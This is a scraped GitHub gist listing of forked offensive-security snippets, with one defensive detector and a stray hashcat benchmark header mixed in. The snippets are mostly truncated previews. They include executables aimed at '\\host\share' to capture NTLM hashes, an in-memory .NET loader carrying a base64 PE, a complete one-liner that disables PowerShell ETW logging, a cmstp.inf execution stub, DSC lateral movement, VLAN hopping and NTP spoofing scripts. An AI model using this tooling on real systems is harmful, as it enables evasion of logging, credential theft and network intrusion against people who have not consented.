Software: Hashcat v3.40-49-g20057d8, Nvidia driver 378.13
Accelerator: 1x Nvidia GTX 1080 Ti FE
- This card is clock-for-clock identical to the Titan X Pascal, so the numbers should not be new or surprising to anyone.
superuser5
superuser5
/ exes_for_NTLM_hash_capture.txt
Created
June 20, 2018 21:16
— forked from anonymous/exes_for_NTLM_hash_capture.txt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Executables for Capturing Hashes (incomplete list) | |
| (all file locations are system32 - win10, impacket-smbserver with -smb2support used for testing) | |
| @0rbz_ | |
| attrib.exe \\host\share | |
| bcdboot.exe \\host\share | |
| bdeunlock.exe \\host\share | |
| cacls.exe \\host\share | |
| certreq.exe \\host\share (noisy, pops an error dialog) |
superuser5
/ LoadInMemoryModule.ps1
Created
June 22, 2018 07:41
— forked from mattifestation/LoadInMemoryModule.ps1
A stealthier method of loading a .NET PE in memory - via the Assembly.LoadModule method
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $Domain = [AppDomain]::CurrentDomain | |
| $DynAssembly = New-Object System.Reflection.AssemblyName('TempAssembly') | |
| $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) | |
| $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('TempModule') | |
| # Create a stub module that the in-memory module (i.e. this mimics the loading of a netmodule at runtime) will be loaded into. | |
| $ModuleBuilder2 = $AssemblyBuilder.DefineDynamicModule('hello.dll') | |
| $TypeBuilder = $ModuleBuilder.DefineType('TempClass', [Reflection.TypeAttributes]::Public) | |
| $TypeBuilder.CreateType() | |
| $HelloDllBytes = [Convert]::FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAJNPvloAAAAAAAAAAOAAAiELAQsAAAQAAAAGAAAAAAAAPiMAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAOQiAABXAAAAAEAAAJgCAAAAAAAAAAAAAAAAAAA |
superuser5
/ Get-ClrReflection.ps1
Created
June 22, 2018 07:53
— forked from dezhub/Get-ClrReflection.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-ClrReflection | |
| { | |
| <# | |
| .SYNOPSIS | |
| Detects memory-only CLR (.NET) modules | |
| Author: Joe Desimone (@dez_) | |
| License: BSD 3-Clause | |
superuser5
/ KillETW.ps1
Created
June 22, 2018 08:56
— forked from tandasat/KillETW.ps1
Disable ETW of the current PowerShell session
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # | |
| # This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled | |
| # which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt | |
| # to bypass Suspicious ScriptBlock Logging for readability. | |
| # | |
| [Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) |
superuser5
/ cmstp.inf
Created
June 22, 2018 09:00
— forked from NickTyrer/cmstp.inf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe /s cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
superuser5
/ account_checker.sh
Created
June 22, 2018 12:25
— forked from haccer/account_checker.sh
PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # PoC Email Account Checker - Checks for emails that don't exist so they can be (re)created | |
| # Use Chrome's Network tab to view the URL that makes these type of requests. | |
| # This is just a PoC, you can add in other email services along with other domains the current ones provide. | |
| # URLs have been working all night, but might need to be updated in the future. | |
| # | |
| # Usage: ./account_checker.sh <email_list> | |
| function google() { | |
| # Post data |
superuser5
/ PowerShellDSCLateralMovement.ps1
Created
July 11, 2018 21:07
— forked from mattifestation/PowerShellDSCLateralMovement.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This idea originated from this blog post on Invoke DSC Resources directly: | |
| # https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/ | |
| <# | |
| $MOFContents = @' | |
| instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref | |
| { | |
| ResourceID = "[Script]ScriptExample"; | |
| GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; | |
| TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True"; |
superuser5
/ 1080ti.md
Created
August 25, 2018 00:19
— forked from epixoip/1080ti.md
superuser5
/ VLANHopperDTP.py
Created
December 17, 2018 08:38
— forked from mgeeky/VLANHopperDTP.py
VLAN Hopping via DTP Trunk (Switch) Spoofing exploit - script automating full VLAN Hopping attack, from DTP detection to VLAN Hop with DHCP lease request.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # | |
| # This script is performing DTP Trunk mode detection and VLAN Hopping | |
| # attack automatically, running sniffer afterwards to collect any other | |
| # VLAN available. To be launched only in Unix/Linux environment as the | |
| # script utilizes following applications: | |
| # - 8021q.ko | |
| # - vconfig | |
| # - ifconfig / ip / route |
superuser5
/ ntpspoof.py
Created
December 18, 2018 08:38
— forked from Dbof/ntpspoof.py
NTP spoofer to change the date of any victim to the year 2035
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import time | |
| from subprocess import Popen, DEVNULL | |
| import datetime | |
| from scapy.all import IP, UDP, NTP | |
| from netfilterqueue import NetfilterQueue | |
| def get_switch_ip(): |